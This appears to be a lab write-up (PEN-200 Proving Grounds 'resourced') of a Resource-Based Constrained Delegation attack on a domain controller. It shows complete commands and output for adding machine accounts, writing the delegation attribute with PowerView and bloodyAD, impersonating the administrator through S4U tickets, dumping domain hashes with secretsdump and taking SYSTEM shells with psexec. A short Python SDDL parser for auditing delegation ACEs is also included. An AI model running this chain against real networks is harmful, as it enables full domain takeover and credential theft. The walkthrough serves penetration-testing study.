Resource-Based Constrained Delegation
The target domain has been identified to contain a critical misconfiguration: a domain user has been granted GenericAll over the DC computer object, which can be abused for a Resource-Based Constrained Delegation (RBCD) attack.
Local (PowerView.ps1 and Powermad.ps1)
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload Powermad.ps1
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/resourced/Powermad.ps1 to C:\Users\L.Livingstone\Documents\Powermad.ps1
Data: 180780 bytes of 180780 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload PowerView.ps1
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/resourced/PowerView.ps1 to C:\Users\L.Livingstone\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\Powermad.ps1
Delivery complete
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added
Since there isn't any account with a configured SPN that I can control, I can first leverage the default SeMachineAccountPrivilege to create a domain computer object, attackersystem$:Summer2018!, via Powermad's New-MachineAccount cmdlet.
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $ComputerSid
S-1-5-21-537427935-490066102-1511301751-4101
Then, I can use PowerView's Get-DomainComputer cmdlet to retrieve and store the SID of the newly created computer object (attackersystem$).
Arbitrary ACE with SID
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" ; $SDBytes = New-Object byte[] ($SD.BinaryLength) ; $SD.GetBinaryForm($SDBytes, 0)
Then, an arbitrary ACE must be built with the SID of the newly created computer object (attackersystem$), and the binary bytes of the resulting DACL/ACE are obtained. This will become part of the SD (security descriptor) stored on the target object (ResourceDC$).
Delegation
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-DomainComputer ResourceDC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Lastly, the msds-allowedtoactonbehalfofotheridentity attribute of the target object (ResourceDC$) must be modified to contain the ACE created above.
Impersonation
Now, I just need to request a service ticket for the ResourceDC$ host as the newly created computer account (attackersystem$), which now holds the delegation right.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ bloodyAD -d RESOURCED.LOCAL -u 'attackersystem$' -p 'Summer2018!' --host ResourceDC.resourced.local get object 'CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL' --attr servicePrincipalName
distinguishedName: CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ResourceDC.resourced.local; ldap/ResourceDC.resourced.local/ForestDnsZones.resourced.local; ldap/ResourceDC.resourced.local/DomainDnsZones.resourced.local; TERMSRV/RESOURCEDC; TERMSRV/ResourceDC.resourced.local; DNS/ResourceDC.resourced.local; GC/ResourceDC.resourced.local/resourced.local; RestrictedKrbHost/ResourceDC.resourced.local; RestrictedKrbHost/RESOURCEDC; RPC/1f8b2b45-398a-449c-8712-a132f62b4567._msdcs.resourced.local; HOST/RESOURCEDC/resourced; HOST/ResourceDC.resourced.local/resourced; HOST/RESOURCEDC; HOST/ResourceDC.resourced.local; HOST/ResourceDC.resourced.local/resourced.local; E3514235-4B06-11D1-AB04-00C04FC2DCD2/1f8b2b45-398a-449c-8712-a132f62b4567/resourced.local; ldap/RESOURCEDC/resourced; ldap/1f8b2b45-398a-449c-8712-a132f62b4567._msdcs.resourced.local; ldap/ResourceDC.resourced.local/resourced; ldap/RESOURCEDC; ldap/ResourceDC.resourced.local; ldap/ResourceDC.resourced.local/resourced.local
There are a lot of SPNs to choose from; I will go with the generic ldap/ResourceDC.resourced.local SPN.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getST 'RESOURCED.LOCAL/attackersystem$' -spn 'ldap/ResourceDC.resourced.local' -impersonate administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
Impersonation complete. Service ticket saved
Hashdump
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-secretsdump RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain level compromise
Shell Drop
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file fSyxYwoI.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service UWdy on ResourceDC.resourced.local.....
[*] Starting service UWdy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
ResourceDC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.169.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.169.254
System level compromise
Remote (Impacket)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache impacket-addcomputer RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -no-pass -k -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-host ResourceDC.resourced.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account blah$ with password Qwer1234.
Adding a computer object: blah$:Qwer1234
Arbitrary ACE with the SID and Delegation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache impacket-rbcd RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -no-pass -k -delegate-from 'blah$' -delegate-to 'ResourceDC$' -action write -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] invalid server address
impacket-rbcd keeps failing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache bloodyAD -d RESOURCED.LOCAL -k --host ResourceDC.resourced.local --dc-ip $IP add rbcd 'ResourceDC$' 'blah$'
[!] No security descriptor has been returned, a new one will be created
[+] blah$ can now impersonate users on ResourceDC$ via S4U2Proxy
Falling back to bloodyAD: the command above writes the SID of the newly created blah$ account to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the ResourceDC$ host.
Confirmation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ bloodyAD -d RESOURCED.LOCAL -u 'blah$' -p 'Qwer1234' --host ResourceDC.resourced.local get object 'CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL' --attr msDS-AllowedToActOnBehalfOfOtherIdentity
distinguishedName: CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL
msDS-AllowedToActOnBehalfOfOtherIdentity: O:S-1-5-32-544D:(A;OICI;CR;;;S-1-5-21-537427935-490066102-1511301751-4101)
This can be confirmed: querying the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the ResourceDC$ host now shows the ACE entry A;OICI;CR;;;S-1-5-21-537427935-490066102-1511301751-4101, whose trustee SID is the newly created blah$ account.
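The two security descriptor strings in this write-up (the one PowerView built under "Arbitrary ACE with SID" and the one bloodyAD reads back here) can be decoded and audited with a short SDDL parser. This is an added example, not code from the write-up or from PowerView/bloodyAD; the function names and the allow-list of expected trustee SIDs are assumptions for illustration.

```python
"""Decode the SDDL form of msDS-AllowedToActOnBehalfOfOtherIdentity and flag
unexpected trustees. Added audit example, not code from the write-up. The two
SDDL strings are the ones shown in the write-up; the allow-list is an assumption.
"""
import re
from dataclasses import dataclass

# Two-letter SDDL access-right codes (Active Directory subset).
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE", "RC": "READ_CONTROL", "SD": "DELETE",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "CC": "DS_CREATE_CHILD",
    "DC": "DS_DELETE_CHILD", "LC": "DS_LIST", "SW": "DS_SELF",
    "RP": "DS_READ_PROP", "WP": "DS_WRITE_PROP", "DT": "DS_DELETE_TREE",
    "LO": "DS_LIST_OBJECT", "CR": "DS_CONTROL_ACCESS",
}
FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE",
         "IO": "INHERIT_ONLY", "ID": "INHERITED"}
# Well-known SID aliases that may appear in the owner or trustee field.
SID_ALIASES = {"BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11", "WD": "S-1-1-0"}

# Security descriptors from the write-up: the one PowerView built for attackersystem$
# and the one bloodyAD later read back from ResourceDC$ for blah$.
POWERVIEW_SD = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-537427935-490066102-1511301751-4101)"
BLOODYAD_SD = "O:S-1-5-32-544D:(A;OICI;CR;;;S-1-5-21-537427935-490066102-1511301751-4101)"


@dataclass
class Ace:
    ace_type: str        # "A" allow, "D" deny, ...
    flags: list
    rights: list
    trustee: str         # SID of the account granted (or denied) the rights


@dataclass
class SecurityDescriptor:
    owner: str
    aces: list


def _pairs(s):
    """SDDL concatenates two-letter codes with no separator."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_ace(text):
    fields = text.split(";")
    if len(fields) != 6:
        raise ValueError(f"malformed ACE: {text!r}")
    ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields
    if rights.lower().startswith("0x"):
        decoded = [rights]                       # raw access mask, left as-is
    else:
        decoded = [RIGHTS.get(r, r) for r in _pairs(rights)]
    return Ace(ace_type, [FLAGS.get(f, f) for f in _pairs(flags)],
               decoded, SID_ALIASES.get(sid, sid))


def parse_sddl(sddl):
    owner_m = re.match(r"O:(?P<owner>.*?)(?=G:|D:|S:|$)", sddl)
    owner = SID_ALIASES.get(owner_m.group("owner"), owner_m.group("owner")) if owner_m else ""
    dacl_m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", dacl_m.group(1))] if dacl_m else []
    return SecurityDescriptor(owner, aces)


def rid(sid):
    """Relative identifier, the last component of a SID."""
    return int(sid.rsplit("-", 1)[1])


def unexpected_trustees(sddl, expected_sids):
    """Trustees holding an allow ACE in msDS-AllowedToActOnBehalfOfOtherIdentity
    that are not on the allow-list. Any hit is a delegation right nobody approved."""
    sd = parse_sddl(sddl)
    return [a.trustee for a in sd.aces if a.ace_type == "A" and a.trustee not in expected_sids]


if __name__ == "__main__":
    for label, sd in (("PowerView", POWERVIEW_SD), ("bloodyAD", BLOODYAD_SD)):
        parsed = parse_sddl(sd)
        print(label, "owner:", parsed.owner)
        for ace in parsed.aces:
            print("  ", ace.ace_type, ace.flags, ace.rights, ace.trustee, "RID", rid(ace.trustee))
    # Assumed allow-list: no account should be allowed to act on behalf of the DC.
    print("unexpected:", unexpected_trustees(BLOODYAD_SD, set()))
```

Run periodically against the attribute on every DC and tier-0 host; a DC whose attribute holds any allow ACE at all, let alone one for a freshly created machine account, is the finding this write-up exploits.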
Service Ticket (Impersonate)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getST 'RESOURCED.LOCAL/blah$' -spn 'DNS/ResourceDC.resourced.local' -impersonate administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
This time, I will use the DNS/ResourceDC.resourced.local SPN.
Impersonation complete. Service ticket saved
Shell Drop
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file vspROgIl.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service BXdO on ResourceDC.resourced.local.....
[*] Starting service BXdO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
ResourceDC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.169.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.169.254
System level compromise
Hashdump
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-secretsdump RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain level compromise